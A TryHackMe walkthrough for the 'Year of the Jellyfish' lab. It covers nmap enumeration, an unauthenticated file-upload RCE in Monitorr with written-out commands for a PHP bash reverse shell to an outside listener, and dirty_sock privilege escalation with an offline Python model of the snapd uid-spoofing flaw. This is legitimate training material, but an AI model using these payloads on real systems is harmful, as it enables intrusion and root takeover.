Year of the Jellyfish TryHackMe Walkthrough

 

 

Nmap Scan

 Nmap scan report for ec2-54-154-149-95.eu-west-1.compute.amazonaws.com (54.154.149.95)  
 Host is up (0.21s latency).  
 Not shown: 995 filtered ports  
 PORT   STATE SERVICE VERSION  
 21/tcp  open ftp   vsftpd 3.0.3  
 22/tcp  open ssh   OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)  
 | ssh-hostkey:   
 |_ 2048 46:b2:81:be:e0:bc:a7:86:39:39:82:5b:bf:e5:65:58 (RSA)  
 80/tcp  open http   Apache httpd 2.4.29  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 |_http-server-header: Apache/2.4.29 (Ubuntu)  
 |_http-title: Did not follow redirect to https://robyns-petshop.thm/  
 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 |_http-server-header: Apache/2.4.29 (Ubuntu)  
 |_http-title: Robyn's Pet Shop  
 | ssl-cert: Subject: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB  
 | Subject Alternative Name: DNS:robyns-petshop.thm, DNS:monitorr.robyns-petshop.thm, DNS:beta.robyns-petshop.thm, DNS:dev.robyns-petshop.thm  
 | Issuer: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB  
 | Public Key type: rsa  
 | Public Key bits: 2048  
 | Signature Algorithm: sha256WithRSAEncryption  
 | Not valid before: 2021-04-25T12:55:33  
 | Not valid after: 2022-04-25T12:55:33  
 | MD5:  5e00 d923 e57a 0805 8112 1ba9 3492 fcc5  
 |_SHA-1: 7038 42c1 5c02 fa73 3064 ac31 fd42 1443 50e3 68fe  
 |_ssl-date: TLS randomness does not represent time  
 | tls-alpn:   
 |_ http/1.1  
 8000/tcp open http-alt  
 | fingerprint-strings:   
 |  GenericLines:   
 |   HTTP/1.1 400 Bad Request  
 |   Content-Length: 15  
 |_  Request  
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :  
 SF-Port8000-TCP:V=7.91%I=7%D=4/25%Time=6085673A%P=x86_64-pc-linux-gnu%r(Ge  
 SF:nericLines,3F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x2  
 SF:015\r\n\r\n400\x20Bad\x20Request");  
 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port  
 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete  
 No OS matches for host  
 Uptime guess: 23.288 days (since Fri Apr 2 11:32:36 2021)  
 TCP Sequence Prediction: Difficulty=264 (Good luck!)  
 IP ID Sequence Generation: All zeros  
 Service Info: Host: robyns-petshop.thm; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel  



Enumeration

The nmap output (or the TLS certificate on port 443, if you open it yourself) lists four hostnames in the certificate's Subject Alternative Name field:

robyns-petshop.thm

monitorr.robyns-petshop.thm

beta.robyns-petshop.thm

dev.robyns-petshop.thm

Add all four to /etc/hosts, pointing at the target IP, so the Apache virtual hosts resolve (port 80 only redirects to https://robyns-petshop.thm/).









robyns-petshop.thm

The main site is the pet shop front page from the http-title. Pico from GitHub? Okay...



monitorr.robyns-petshop.thm
 
 
 
 

https://www.exploit-db.com/exploits/48980 (Monitorr 1.7.6m - Unauthenticated Remote Code Execution)

Sounds good :)

But the exploit did not work as-is. After reading it, the mechanism turned out to be simple: it POSTs a file to assets/php/upload.php and then requests that file back from assets/data/usrimg/ so PHP executes it. The upload filter is bypassed by prepending an image signature to the PHP (the PoC uses a GIF header; my command below uses the PNG signature).

So I uploaded the shell with curl. The first attempt failed. Looking at the site in a cookie editor I noticed it sets a cookie, isHuman=1, so I added that cookie header to the curl request and uploaded the PHP shell with the image magic number again. This time I got the reverse connection back.

If you don't follow how this works, read the short Python PoC at https://www.exploit-db.com/exploits/48980.
 
 
 
 
 
 
 
COMMANDS TO GET INITIAL SHELL

# 1. Build the payload: the 8-byte PNG signature followed by a PHP one-liner that spawns a bash reverse shell to 10.9.20.61:80 (have a listener waiting on that port first)
echo -e $'\x89\x50\x4e\x47\x0d\x0a\x1a\n<?php echo system("bash -c \'bash -i >& /dev/tcp/10.9.20.61/80 0>&1\'");' > shell.png.pHp

# 2. Upload it to Monitorr's upload endpoint; -k skips verification of the self-signed certificate, and the isHuman=1 cookie is what made the upload go through
curl -k -F "fileToUpload=@./shell.png.pHp" https://monitorr.robyns-petshop.thm/assets/php/upload.php -H "Cookie: isHuman=1"  

# 3. Request the uploaded file so PHP executes it and the shell connects back
curl -k https://monitorr.robyns-petshop.thm/assets/data/usrimg/shell.png.php  

 

 

Initial shell. From here, flag1.txt can be read.



PRIVILEGE ESCALATION

I usually rely on linpeas/LinEnum for privilege escalation, but this time neither gave me anything interesting; I found some hashes but they were not useful.

So I used linux-exploit-suggester: https://github.com/mzet-/linux-exploit-suggester

It reported a lot of candidate exploits. I tried dirty_sock, which I had also used a few weeks ago for privilege escalation on an HTB machine whose name I can't remember; if you know it, comment below :)


Download the dirty_sock exploit:

wget https://github.com/initstring/dirty_sock/archive/master.zip

Transfer it to the target and run the exploit; it talks to snapd's local socket, so it has to run on the box itself.
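What dirty_sock actually does, re-created offline in Python as an added example (this is my code, not the page's or initstring's): snapd before 2.37.1 (CVE-2019-7304) described each connection to its local REST API with a string built from the peer's credentials followed by the peer socket's own address, then parsed the uid back out of that string token by token. A client that binds its socket to a path ending in ";uid=0;" is therefore parsed as root. The functions below model that string and the vulnerable parser as described in the public write-up, add a hardened parser of my own (not snapd's actual patch), and include a version check based on the affected range stated in the dirty_sock README. The pid, uid and socket paths are made-up sample values.

```python
"""dirty_sock (CVE-2019-7304) uid spoofing against snapd, re-created offline (added example)."""
import random
import string
from typing import Dict, Optional


def snapd_remote_addr(pid: int, uid: int, local_sock: str, peer_name: str) -> str:
    """Pre-2.37.1 snapd described a REST API connection with a string built from
    SO_PEERCRED (pid, uid) and the peer's own socket address. The peer address is
    chosen by the client, which is the whole problem."""
    return f"pid={pid};uid={uid};socket={local_sock};{peer_name}"


def ucrednet_get_vulnerable(remote_addr: str) -> Dict[str, Optional[object]]:
    """Re-creation of the vulnerable parser: split on ';' and honour every 'uid='
    token, so a later token coming from the peer name overrides the real uid."""
    out: Dict[str, Optional[object]] = {"pid": None, "uid": None, "socket": None}
    for token in remote_addr.split(";"):
        if token.startswith("pid="):
            out["pid"] = int(token[4:])
        elif token.startswith("uid="):
            out["uid"] = int(token[4:])
        elif token.startswith("socket="):
            out["socket"] = token[7:]
    return out


def ucrednet_get_hardened(remote_addr: str) -> Dict[str, object]:
    """My own hardened parser (not snapd's actual patch): credentials are read only
    from the two leading fields; everything after 'socket=' is opaque path data."""
    pid_tok, uid_tok, rest = remote_addr.split(";", 2)
    if not (pid_tok.startswith("pid=") and uid_tok.startswith("uid=")
            and rest.startswith("socket=")):
        raise ValueError("malformed remote address")
    return {"pid": int(pid_tok[4:]), "uid": int(uid_tok[4:]), "socket": rest[7:]}


def dirty_sock_bind_path() -> str:
    """The client socket path dirty_sock binds before connecting to /run/snapd.socket.
    The trailing ';uid=0;' is what ends up inside snapd's remote address string."""
    rnd = "".join(random.choice(string.ascii_lowercase) for _ in range(10))
    return f"/tmp/{rnd};uid=0;"


def snapd_version_vulnerable(version: str) -> bool:
    """Per the dirty_sock README, snapd 2.28 through 2.37 are affected and 2.37.1
    fixed it. Compares the numeric prefix of 'snap version' output ('2.32.3+18.04')."""
    nums = tuple(int(p) for p in version.split("+")[0].split("~")[0].split(".") if p.isdigit())
    return (2, 28) <= nums < (2, 37, 1)


if __name__ == "__main__":
    # Sample values: an unprivileged client (uid 1000) connecting from a dirty_sock-style path.
    addr = snapd_remote_addr(4242, 1000, "/run/snapd.socket", dirty_sock_bind_path())
    print("remote address seen by snapd:", addr)
    print("vulnerable parser uid:", ucrednet_get_vulnerable(addr)["uid"])
    print("hardened parser uid:  ", ucrednet_get_hardened(addr)["uid"])
```

Once snapd believes the caller is uid 0, the real exploit simply uses the API as root (installing a crafted snap or creating a sudo user); this script stops at the spoof, which is the part worth understanding before running someone else's PoC.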


It looks like an easy machine, but it has a lot of rabbit holes.

Don't try harder,

       Enumerate harder!!

Understanding the exploit is what matters :)

Comments

  1. Armageddon - dirty_sock
